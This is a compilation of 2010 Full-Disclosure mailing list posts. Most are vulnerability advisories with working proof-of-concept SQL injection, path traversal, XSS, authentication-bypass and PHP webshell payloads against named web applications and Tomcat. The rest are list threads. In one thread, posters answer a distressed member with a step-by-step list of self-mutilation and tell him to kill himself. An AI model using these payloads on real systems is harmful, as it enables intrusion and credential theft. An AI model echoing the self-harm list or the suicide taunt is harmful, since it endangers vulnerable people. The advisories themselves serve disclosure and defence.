[Full-disclosure] 'Pointter PHP Micro-Blogging Social Network' Unauthorized Privilege Escalation (CVE-2010-4333)
'Pointter PHP Micro-Blogging Social Network' Unauthorized Privilege Escalation (CVE-2010-4333) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in the 'Pointter PHP Micro-Blogging Social Network' authentication system which allows for administrative privileges by crafting two specific cookies with arbitrary values. II. TESTED VERSION --- 1.8 III. PoC EXPLOIT --- Using whatever method you prefer, generate 'auser' and 'apass' cookies. The values of each cookie are irrelevant; the mere presence of the cookies provide the administrative privilege. IV. NOTES --- * Here's a snippet of the final reply that I received from the vendor: Of course, it could be made safer and we know how to do it. But we have designed the softwares so that renaming admin folder gives us less work. As you know, the users should know the security issues as they will run this and not us. V. SOLUTION --- * There is no update released at this time. Avoidance of this software is recommended until an updated version is available. VI. REFERENCES --- http://www.pointter.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4333 http://www.uncompiled.com/2010/12/pointter-php-micro-blogging-social-network-unauthorized-privilege-escalation-cve-2010-4333/ VII. TIMELINE --- 11/23/2010 - Initial vendor disclosure e-mail sent 11/24/2010 - Reply from vendor informing me that my 'software manipulation' was illegal 11/24/2010 - Response to vendor regarding their accusation of illegal actions on my part 11/24/2010 - Reply from vendor stating that by releasing this information, I am committing a crime 11/24/2010 - Response to vendor that their software is CC-licensed and that their accusations are unfounded 11/24/2010 - Rebuttal from vendor again affirming I was breaking the law by disclosing this vulnerability 11/24/2010 - Reply to vendor again stating my intent to help the company and provide responsible disclosure 11/24/2010 - Response from vendor stating they would no longer respond and explained their stance on fixing this issue 11/24/2010 - Final reply to vendor stating that I was happy to work with them on a delayed disclosure if desired 12/15/2010 - Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Allegations regarding OpenBSD IPSEC
On Dec 15, 2010, at 5:23 PM, Graham Gower wrote: On 16 December 2010 09:50, Larry Seltzer la...@larryseltzer.com wrote: Has anyone read this yet? http://www.downspout.org/?q=node/3 Seems IPSEC might have a back door written into it by the FBI? Surely the thing to do now is not to audit *your own* OpenBSD code, but to audit the OpenBSD code from about 8 years ago. If there's nothing there, then the claim is BS. LJS ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Or get hold of the old version of OpenBSD used at EOUSA and compare it to the OpenBSD code from the same time. __ why should anyone other than a us attorney or perhaps an asst us attorney give a rat's ass what may have been going on in their govt issue vpn some years ago? but, as they prosecute federal crimes, if anyone committed a federal crime within their office due to this they are certainly equipped to go after them. these guys have nothing to do with the fbi (they are familially one of the fbi's little first cousins within justice dept) and also have nothing to do with the openbsd distribution. justice and fbi and darpa barely talk with each other about technology is my very strong impression. this whole story makes very little sense to anyone who was at all acquainted with this scene at the time. unless you control the compiler (see ken thompson's turing award lecture) it's a fanciful idea that you could successfully plant a backdoor in an open source OS and expect it to survive. why even bother? (now, watering down the s boxes in single des, that might be feasible...) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'Pulse CMS Basic' Local File Inclusion Vulnerability (CVE-2010-4330)
'Pulse CMS Basic' Local File Inclusion Vulnerability (CVE-2010-4330) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in the 'includes/controller.php' script that allows for arbitrary local file inclusion due to a null-byte attack. II. TESTED VERSION --- Version 1.2.8 III. AFFECTED VERSIONS --- 1.2.9 IV. PoC EXPLOIT --- http://www.example.com/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00 V. NOTES --- * magic_quotes_gpc must be disabled for null-byte attacks to work * This issue did not affect Pulse CMS Pro according to the vendor VI. SOLUTION --- Upgrade all previously installed versions to 1.2.9 VII. REFERENCES --- http://pulsecms.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4330 http://www.uncompiled.com/2010/12/pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330/ VIII. TIMELINE --- 11/24/2010: Initial vendor disclosure 11/25/2010: Vendor response that they had fixed the issue updated the existing version (1.2.8) 11/25/2010: Replied to vendor inquiring if a new point release would be made and affected versions 11/26/2010: Vendor response noting a version increment was coming vulnerable versions confirmation 11/26/2010: Pulse CMS Basic 1.2.9 released 12/05/2010: Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'Orbis CMS' Arbitrary Script Execution Vulnerability (CVE-2010-4313)
'Orbis CMS' Arbitrary Script Execution Vulnerability (CVE-2010-4313) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in the 'Orbis CMS' fileman_file_upload.php script that allows any authenticated user to upload a PHP script and then run it without restriction. II. TESTED VERSION --- 1.0.2 III. PoC EXPLOIT --- 1) Login as any CMS user (administrator or non-administrator) 2) Upload your desired PHP script (e.g. cmd.php) 3) Navigate to http://www.example.com/orbis/uploads/cmd.php?cmd=cat%20/etc/passwd IV. NOTES --- * This software is no longer developed according to the product page; it is still available for download though. * Various other vulnerabilities exist in this code base (at least for previous versions); it's advisable not to use this software as patches are not coming. * A vendor notice was not done for the aforementioned reasons. V. SOLUTION --- Overhaul the upload verification portion of fileman_file_upload.php completely. VI. REFERENCES --- http://www.novo-ws.com/orbis-cms/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4313 http://www.uncompiled.com/2010/11/orbis-cms-arbitrary-script-execution-vulnerability-cve-2010-4313/ VII. TIMELINE --- 11/30/2010: Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability
Severity: Tomcat 7.0.x - Low, Tomcat 6.0.x - Moderate
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.4
- Not affected in default configuration.
- Affected if CSRF protection is disabled
- Additional XSS issues if web applications are untrusted
- - Tomcat 6.0.12 to 6.0.29
- Affected in default configuration
- Additional XSS issues if web applications are untrusted
- - Tomcat 5.5.x
- Not affected
Description:
The session list screen (provided by sessionList.jsp) in affected versions uses
the orderBy and sort request parameters without applying filtering and
therefore is vulnerable to a cross-site scripting attack.
Users should be aware that Tomcat 6 does not use httpOnly for session cookies
by default so this vulnerability could expose session cookies from the manager
application to an attacker.
A review of the Manager application by the Apache Tomcat security team
identified additional XSS vulnerabilities if the web applications deployed were
not trusted.
Example:
GET
/manager/html/sessions?path=/sort=scriptalert('xss')/scriptorder=ASCaction=injectSessionsrefresh=Refresh+Sessions+list
Mitigation:
Users of affected versions should apply one of the following mitigations
- - Tomcat 7.0.0 to 7.0.4
- Remove the Manager application
- Remove the sessionList.jsp and sessionDetail.jsp files
- Ensure the CSRF protection is enabled
- Apply the patch 7.0.4 patch (see below)
- Update to 7.0.5 when released
- - Tomcat 6.0.12 to 6.0.29
- Remove the Manager application
- Remove the sessionList.jsp and sessionDetail.jsp files
- Apply the patch for 6.0.29 (see below)
- Update to 6.0.30 when released
No release date has been set for the next Tomcat 7.0.x and Tomcat 6.0.x
releases.
Credit:
The original issue was discovered by Adam Muntner of Gotham Digital Science.
Additional issues were identified by the Tomcat security team as a result of
reviewing the original issue.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
Note: The patches
The Apache Tomcat Security Team
Patch for 6.0.29
Index: webapps/manager/WEB-INF/jsp/sessionDetail.jsp
===
- --- webapps/manager/WEB-INF/jsp/sessionDetail.jsp (revision 1037769)
+++ webapps/manager/WEB-INF/jsp/sessionDetail.jsp (working copy)
@@ -30,8 +30,10 @@
% String path = (String) request.getAttribute(path);
Session currentSession = (Session)request.getAttribute(currentSession);
HttpSession currentHttpSession = currentSession.getSession();
- - String currentSessionId = currentSession.getId();
- - String submitUrl =
((HttpServletRequest)pageContext.getRequest()).getRequestURL().toString();
+ String currentSessionId = JspHelper.escapeXml(currentSession.getId());
+ String submitUrl = JspHelper.escapeXml(
+ ((HttpServletRequest) pageContext.getRequest()).getRequestURI() +
+ ?path= + path);
%
head
meta http-equiv=content-type content=text/html; charset=iso-8859-1/
@@ -45,7 +47,7 @@
titleSessions Administration: details for %= currentSessionId
%/title
/head
body
- -h1Details for Session %= JspHelper.escapeXml(currentSessionId) %/h1
+h1Details for Session %= currentSessionId %/h1
table style=text-align: left; border=0
tr
@@ -54,7 +56,7 @@
/tr
tr
thGuessed Locale/th
- -td%= JspHelper.guessDisplayLocaleFromSession(currentSession) %/td
+td%=
JspHelper.escapeXml(JspHelper.guessDisplayLocaleFromSession(currentSession))
%/td
/tr
tr
thGuessed User/th
@@ -120,7 +122,7 @@
String attributeName = (String) attributeNamesEnumeration.nextElement();
%
tr
- - td align=centerform action=%= submitUrl
%divinput type=hidden name=path value=%= path % /input
type=hidden name=action value=removeSessionAttribute /input
type=hidden name=sessionId value=%= currentSessionId % /input
type=hidden name=attributeName value=%= attributeName % /input
type=submit value=Remove //div/form/td
+ td align=centerform action=%= submitUrl
%divinput type=hidden name=action value=removeSessionAttribute
/input type=hidden name=sessionId value=%= currentSessionId %
/input type=hidden name=attributeName value=%=
JspHelper.escapeXml(attributeName) % /input type=submit value=Remove
//div/form/td
td%= JspHelper.escapeXml(attributeName) %/td
td% Object attributeValue =
currentHttpSession.getAttribute(attributeName); %span title=%=
attributeValue == null ? : attributeValue.getClass().toString() %%=
JspHelper.escapeXml(attributeValue) %/span/td
/tr
Index: webapps/manager/WEB-INF/jsp/sessionsList.jsp
[Full-disclosure] [SECURITY] CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2010-4172: Apache Tomcat Manager application XSS vulnerability
Severity: Tomcat 7.0.x - Low, Tomcat 6.0.x - Moderate
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.4
- Not affected in default configuration.
- Affected if CSRF protection is disabled
- Additional XSS issues if web applications are untrusted
- - Tomcat 6.0.12 to 6.0.29
- Affected in default configuration
- Additional XSS issues if web applications are untrusted
- - Tomcat 5.5.x
- Not affected
Description:
The session list screen (provided by sessionList.jsp) in affected
versions uses the orderBy and sort request parameters without applying
filtering and therefore is vulnerable to a cross-site scripting attack.
Users should be aware that Tomcat 6 does not use httpOnly for session
cookies by default so this vulnerability could expose session cookies
from the manager application to an attacker.
A review of the Manager application by the Apache Tomcat security team
identified additional XSS vulnerabilities if the web applications
deployed were not trusted.
Example:
GET
/manager/html/sessions?path=/sort=scriptalert('xss')/scriptorder=ASCaction=injectSessionsrefresh=Refresh+Sessions+list
Mitigation:
Users of affected versions should apply one of the following mitigations
- - Tomcat 7.0.0 to 7.0.4
- Remove the Manager application
- Remove the sessionList.jsp and sessionDetail.jsp files
- Ensure the CSRF protection is enabled
- Apply the patch 7.0.4 patch (see below)
- Update to 7.0.5 when released
- - Tomcat 6.0.12 to 6.0.29
- Remove the Manager application
- Remove the sessionList.jsp and sessionDetail.jsp files
- Apply the patch for 6.0.29 (see below)
- Update to 6.0.30 when released
No release date has been set for the next Tomcat 7.0.x and Tomcat 6.0.x
releases.
Credit:
The original issue was discovered by Adam Muntner of Gotham Digital Science.
Additional issues were identified by the Tomcat security team as a
result of reviewing the original issue.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
Note: The patches The Apache Tomcat Security Team
Patch for 6.0.29
Index: webapps/manager/WEB-INF/jsp/sessionDetail.jsp
===
- --- webapps/manager/WEB-INF/jsp/sessionDetail.jsp (revision 1037769)
+++ webapps/manager/WEB-INF/jsp/sessionDetail.jsp (working copy)
@@ -30,8 +30,10 @@
% String path = (String) request.getAttribute(path);
Session currentSession =
(Session)request.getAttribute(currentSession);
HttpSession currentHttpSession = currentSession.getSession();
- - String currentSessionId = currentSession.getId();
- - String submitUrl =
((HttpServletRequest)pageContext.getRequest()).getRequestURL().toString();
+ String currentSessionId = JspHelper.escapeXml(currentSession.getId());
+ String submitUrl = JspHelper.escapeXml(
+ ((HttpServletRequest)
pageContext.getRequest()).getRequestURI() +
+ ?path= + path);
%
head
meta http-equiv=content-type content=text/html;
charset=iso-8859-1/
@@ -45,7 +47,7 @@
titleSessions Administration: details for %= currentSessionId
%/title
/head
body
- -h1Details for Session %= JspHelper.escapeXml(currentSessionId) %/h1
+h1Details for Session %= currentSessionId %/h1
table style=text-align: left; border=0
tr
@@ -54,7 +56,7 @@
/tr
tr
thGuessed Locale/th
- -td%= JspHelper.guessDisplayLocaleFromSession(currentSession)
%/td
+td%=
JspHelper.escapeXml(JspHelper.guessDisplayLocaleFromSession(currentSession))
%/td
/tr
tr
thGuessed User/th
@@ -120,7 +122,7 @@
String attributeName = (String)
attributeNamesEnumeration.nextElement();
%
tr
- - td align=centerform action=%= submitUrl
%divinput
type=hidden name=path value=%= path % /input type=hidden
name=action value=removeSessionAttribute /input type=hidden
name=sessionId value=%= currentSessionId % /input type=hidden
name=attributeName value=%= attributeName % /input type=submit
value=Remove //div/form/td
+ td align=centerform action=%= submitUrl
%divinput
type=hidden name=action value=removeSessionAttribute /input
type=hidden name=sessionId value=%= currentSessionId % /input
type=hidden name=attributeName value=%=
JspHelper.escapeXml(attributeName) % /input type=submit
value=Remove //div/form/td
td%= JspHelper.escapeXml(attributeName) %/td
td% Object attributeValue =
currentHttpSession.getAttribute(attributeName); %span title=%=
attributeValue == null ? : attributeValue.getClass().toString()
%%= JspHelper.escapeXml(attributeValue) %/span/td
/tr
Index: webapps/manager/WEB-INF/jsp/sessionsList.jsp
[Full-disclosure] 'Free Simple Software' SQL Injection Vulnerability (CVE-2010-4298)
'Free Simple Software' SQL Injection Vulnerability (CVE-2010-4298) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in the 'Free Simple Software' download module which allows for a 'UNION SELECT' to easily expose the application administrator's plaintext password. II. TESTED VERSION --- 1.0 [Manual Install Version] III. PoC EXPLOIT --- http://site.com/index.php?page=downloadsrequest=download_nowdownloads_id=' UNION SELECT email_address as name, NULL, NULL, password as file_name, last_name as file_url from admin_users where id!='NULL IV. NOTES --- * User passwords for this web application are not encrypted or hashed which makes this exploit even more concerning. * The PoC assumes that the first user is the administrative user which is the default behavior for the application. * At least 1 download must already exist to enable this exploit. * Due to a previous vulnerability not being fixed 3-months after disclosure (CVE-2010-3307), it's assumable that this application is not being actively developed. V. SOLUTION --- Do not utilize the download module. No patch/upgrade is available at this time. VI. REFERENCES --- http://www.freesimplesoft.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4298 https://www.uncompiled.com/2010/11/free-simple-software-sql-injection-vulnerability-cve-2010-4298/ VII. TIMELINE --- 11/12/2010: Initial disclosure e-mail to the vendor 11/21/2010: Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 'WSN Links' SQL Injection Vulnerability (CVE-2010-4006)
'WSN Links' SQL Injection Vulnerability (CVE-2010-4006) Mark Stanislav - mark.stanis...@gmail.com I. DESCRIPTION --- A vulnerability exists in the search.php code that allows for SQL injection of various parameters. By assembling portions of SQL code between the affected parameters, successful SQL injection into the software can occur. In the testing done, various 'UNION SELECT' SQL injections can occur. II. AFFECTED VERSIONS --- 6.0.1; 5.1.51 ; 5.0.81 III. TESTED VERSIONS --- 5.1.40 5.1.49 IV. PoC EXPLOITS --- 1) A 'UNION SELECT' which results in a PHP shell-execution script http://example.com/search.php?namecondition=IS%20NULL))%20UNION%20((SELECT%20?php%20system($_REQUEST[cmd]);%20?%20INTO%20OUTFILEnamesearch=/var/www/exec.phpaction=filterfilled=1whichtype=categories 2) A 'UNION SELECT' which results in a member's name, password hash, and e-mail to be extracted to a file http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20concat(name,0x3a,password,0x3a,email)%20FROM%20wsnlinks_members%20INTO%20OUTFILEnamesearch=/var/www/pass.txtaction=filterfilled=1whichtype=categories 3) A 'UNION SELECT' which results in the /etc/passwd file being copied to a web directory file http://example.com/search.php?namecondition=IS%20NOT%20NULL))%20UNION%20((SELECT%20load_file(0x2f6574632f706173737764)%20INTO%20OUTFILEnamesearch=/var/www/passwd.txtaction=filterfilled=1whichtype=categories V. NOTES --- * The above exploits require 'FILE' SQL privilege as well as poor web directory permissions to work. * Only 'namecondition' and 'namesearch' are utilized for the actual SQL injection. * There is potential to exploit this vulnerability which outputs user data directly to the browser. * Passing 'debug=1' as a query value easily enables debug mode of tested 'WSN Links' deployments. VI. SOLUTION --- Upgrade to the most recent version of your 'WSN Links' code branch. VII. REFERENCES --- http://www.wsnlinks.com/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4006 http://www.uncompiled.com/2010/10/wsn-links-sql-injection-vulnerability-cve-2010-4006/ VIII. TIMELINE --- 10/10/2010: Initial discloure e-mail to the vendor 10/18/2010: Follow-up via the vendor's contact web form 10/18/2010: Vendor acknowledgement/commitment to fix 10/21/2010: Patched versions released 10/31/2010: Public disclosure ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] targetted SSH bruteforce attacks
It's impossible for anyone on this mailing list to know if the attack is personal or not, unless they are actually involved in the attack. Use a password such as 7%Ônç#®]�...@ãnÝèÅ#çñ] and watch them hack away to their heart's content. On 17/06/2010 13:48, Gary Baribault wrote: Hello list, I have a strange situation and would like information from the list members. I have three Linux boxes exposed to the Internet. Two of them are on cable modems, and both have two services that are publicly available. In both cases, I have SSH and named running and available to the public. Before you folks say it, yes I run SSH on TCP/22 and no I don't want to move it to another port, and no I don't want to restrict it to certain source IPs. Both of these systems are within one /21 and get attacked regularly. I run Denyhosts on them, and update the central server once an hour with attacking IPs, and obviously also download the public hosts.deny list. These machines get hit regularly, so often that I don't really care, it's fun to make the script kiddies waste their time! But in this instance, only my home box is being attacked... someone is burning a lot of cycles and hosts to do a distributed dictionary attack on my one box! The named daemon is non recursive, properly configured, up to date and not being attacked. Is anyone else seeing this type of attack? Or is someone really targeting MY box? Thanks Gary Baribault Courriel: g...@baribault.net GPG Key: 0x685430d1 Signature: 9E4D 1B7C CB9F 9239 11D9 71C3 6C35 C6B7 6854 30D1 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Call for participation -- Eth0:2010 Summer
Hello, Included below is the Call for Papers / Participation of Eth0:2010 Summer. We hope you will be interested in presenting at our conference. Please feel free to forward this message to anyone who you think can add interesting content to our conference. We hope to see you all this summer in Wieringerwerf The Eth0:2010 Summer Program Comittee prog...@eth-0.nl == eth0:2010 -- Call for Papers / Participation == Tuesday August 10th to Friday august 13th 2010 Location: Het Boshuis, Wieringerwerf, Netherlands http://www.eth-0.nl == Important Dates == Submission deadline for contributions Juli 1st Earliest acceptance notificationJuli 5th Latest notification of acceptance Juli 19th Schedule completed August 1st == About eth0:2010 == A conference and summercamp for hackers, developers and internet residents Organised by the eth0 foundation and supported by the Hxx foundation In 'Het Boshuis', Wieringerwerf, North-Holland, the Netherlands. eth0 is searching for lectures, speeches and performances, we will host discussions, workshops and presentations == Subjects == The following subjects are considered interesting and relevant fot eth0: * Privacy * Security * Ethical hacking * Hackerspaces * Open Source * Open Technologies * Politics regarding Piracy, Copyright and Intellectual Property * Bio-Hacking * ... == Submissions == All entries must be submitted to us by using the webform at: http://eth-0.nl/cfp.php We will be needing: * Your name, nickname or pseudonym * The title of your submission * A short bio of you or your group * Optionally, a picture of you / your group * A short (150 words max) summary/description of your subject * A detailed description of your subject * Any requirements (audio/video resources, whiteboard etc) * Contact e-mail adres * If you want to do a lightningtalk (10 min max), a lecture (45 minutes) or a workshop (longer, hands-on) * Language of your presentation (Dutch or English are accepted) == Location and Technology == eth0 will provide the following equipment at the lecture tent: * 230V AC power * A video projector with VGA d-sub connection * Projection screen * Wireless Microphone * Audio Line-in connection (for your laptop) * Video and audio recording of your presentation Should you need anything not listed here, please make a note of this in your submission and we will try to accomodate this as far as possible. If you do not want your presentation recorded (and/or put online) please let us know beforehand. == Reimbursement == eth0:2010 is a non-profit event and the lecturers are not paid. It is unfortunately not possible for us to reimburse travel and accomodation fees. We hope to too you at Eth0:2010 Summer The Program Comittee Aldert Hazenberg Erik Bosman Jeroen Dekkers Mark Janssen ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The feeling of being followed is horrible. Need freedom from survellience. Please god help.
I don't disagree with you. But this mailing list has, over the last 6 months or so (at least) been full of immature script-kiddy dicks who, I honestly believe, would not come back if we were to pay them no attention at all. After all, their need is not knowledge, it's attention. On 21/03/2010 23:34, Christian Sciberras wrote: You might want to consider that every mailing list have its own court jester. ;) On Sun, Mar 21, 2010 at 11:25 PM, Mark Byrne boogiebr...@yahoo.co.uk mailto:boogiebr...@yahoo.co.uk wrote: On 21/03/2010 19:01, Benji wrote: 1) Acquire a knife 2) Acquire a lighter 3) Gouge face until you do not recognise self. 4) Acquire a shaver 5) Shave hair off 6) Cut ears off 7) Acquire plyers 8) Yank all teeth out 9) Walk to a bridge above water, attach shakles to legs 10) Gouge eyes out with knife 11) Burn finger tips off 12) Jump On Sun, Mar 21, 2010 at 5:38 PM, Andrew Walberg andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com mailto:andrew.walb...@rocketmail.com wrote: I need more control of my life. I don't know why I got people following me and pointing out my car in my parking lot, but they are planning some plot. I don't know what they're thinking but they're probably building up more conspiracy theories about me. Perhaps its because of posts I made on here that made them curious. It's only a matter of time until it intensifies. I can't take this. I already had this happen to me in the last city I lived in. They took all this ambigious garbage and soon as you know I have friends asking if I do drugs, going into my medicine cabinets, asking if I'm a hacker. etc. I can't live a life like this guys. Do yourself and everyone else a favour and kill yourself. And to the rest of the members of this mailing list. Read basic psychology. If someone needs attention and you give it to them, they'll be back for more. If you ignore them, they'll go somewhere else to play their stupid, childish games. I just need to feel more anonymous. Not necessarily underground, but I need to be able to live free without survellience. Does living in the big city give you more anonymity? Someone please god help. I need ideas. I'm not a criminal. I've done nothing wrong. Give me tips. __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu Lucid Lynx is Big brother Ubuntu
On 26/02/10 19:55, John Q Public wrote: Well considering the tone I used, Frankly, I'm surprised you even dignified that. I don't always speak in such a tone. It's just the atmosphere of the scene here. I want my system here to be pure and free. No blogcruft. Remember how XP and Vista would always come with Windows Messenger? It's the same philosophical issue. It integrates social networking too closely, and it makes me wanna go into FUD mode. I'm scared here. I'm worried to be stuck with a LTS desktop for 4 years with an experiment that should be done in the _NEXT_ 6mos, in a non-LTS. I appreciate it Mr. Shuttleworth. Our Linux communities are one of the brighter beacons of efficient development out there. Keep up the steamrolling Ubunteros. Well, a little constructive paranoia is a good thing, to keep everyone aware of the risks of abuse. We do have a big responsibility to keep moving forward, even though there is no certainty about what the future looks like, and that involves some risk. The best way I think you can help, is to try the new bits out, and give good feedback in a way that helps people understand what you really mean, and how best to balance that with everyone else's feedback too. All the best, Mark ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Yahoo! UK and US Hiring Security and Risk management experts
yet another nice troll with a stylistic stench of n3td3v about it, judging by the fanciful misconceptions surrounding a kernel of truth (and the phony attribution to someone to whom he's taken an unreasonable disliking...) it's true that yahoo is hiring security people, though, typically not as consultants but as employees -- programmers and engineers who are clueful about security. careers.yahoo.com is a good way, in fact, to find out about those jobs. at rough count 50 jobs in the US (mostly bay area) with the word security in their abstract, and a sizeable number in india, asia, and europe accessible off separate links. also, there are particularly numerous jobs for service engineering pros, people who are good at production services delivery at a very large scale. if there are qualified applicants on this list (or your friends) who want their name put in for something particular, happy to refer them (i'd even get a referral incentive). btw, please mention the specific posted position(s) that you think would suit you. (you don't have to be 25-35. in fact, such a requirement would not be legal under US labor law...). On Feb 27, 2010, at 9:25 AM, Henri Torgemane wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://careers.yahoo.com/ Looking for a dream job? Yahoo! is hiring security consultants worldwide 25-35 to help join our new Cyber Security Task Force. We are working with the government to provide a security service for our web and messenger platforms. Especially people with experience harvesting vital intelligence, which is the life blood of our security system. All aspects of security, risk management, analysis. We embody the paranoid, professional spirit of corporatism. With delight (and muffins!) At Yahoo!, big thinking comes with the territory. When your work reaches over half a billion users--that's 1 out of every 2 people online--there's no small task. We need creative minds that can take us new places. Individuals who want to positively impact their career--and the world at large. We're looking for Big Thinkers who embody the fun, innovative, collaborative spirit that's uniquely Yahoo!. We're looking for people like you. To protect it. I look forward to seeing your applications. Let's protect our data. Let's create the future, together. Henri Torgemane -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkuJVZsACgkQuR8Y8cR7pG3otgP/XF4VY9U1UAaobymiyxEdfb3FWfc1 qx/1tDAuUL7mMRzgex+Z3+IycD2BNAeDHBxXE60dq6hqIUSQJZfEqIzvncSp4QZNjg1q O63YvCE0EcjzQbaqxC/nnG2gUZjzq8WY1aJnM0nP39SKOwcCzBL8TAykNzTaBZkc4f/8 mntbvRg= =cKLr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu Lucid Lynx is Big brother Ubuntu
